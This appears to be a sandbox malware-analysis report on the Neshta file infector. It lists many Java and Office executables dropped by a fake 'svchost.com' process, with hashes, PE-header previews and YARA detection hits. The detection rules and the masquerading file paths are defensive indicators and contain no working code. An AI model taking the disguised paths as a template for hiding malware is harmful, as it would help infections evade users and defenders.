                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.62851477500423
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                                                                                        MD5:61694544EA704A28532F4EC0319AC735
                                                                                                                        SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                                                                                        SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                                                                                        SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6397427450636055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529062771218018
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                                                                                        MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                                                                                        SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                                                                                        SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                                                                                        SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4112170834310565
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                                                                                        MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                                                                                        SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                                                                                        SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                                                                                        SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.374994892226591
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                                                                                        MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                                                                                        SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
                                                                                                                        SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                                                                                        SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.305732261424221
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                                                                                        MD5:3A6E83146F925E67FD9BD350F823858C
                                                                                                                        SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                                                                                        SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                                                                                        SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.375840229458048
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                                                                                        MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                                                                                        SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                                                                                        SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
                                                                                                                        SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461871956296466
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                                                                                        MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                                                                                        SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                                                                                        SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                                                                                        SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.119504084682648
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                                                                                        MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                                                                                        SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                                                                                        SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                                                                                        SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):4.799951544005101
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                                                                                        MD5:7078371E0D358B86D46D6CF87987C8CD
                                                                                                                        SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                                                                                        SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                                                                                        SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.05148718063145
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                                                                                        MD5:D4B144B9963B3114F1D938F44200AE62
                                                                                                                        SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                                                                                        SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                                                                                        SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.365915780903398
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                                                                                        MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                                                                                        SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                                                                                        SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                                                                                        SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.420838658743323
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                                                                                        MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                                                                                        SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                                                                                        SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                                                                                        SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.364257425575085
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                                                                                        MD5:9180D3CEE013A6DE40DD963A16951734
                                                                                                                        SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                                                                                        SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                                                                                        SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.435519044418047
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                                                                                        MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                                                                                        SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                                                                                        SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                                                                                        SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.278417014765199
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                                                                                        MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                                                                                        SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                                                                                        SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                                                                                        SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
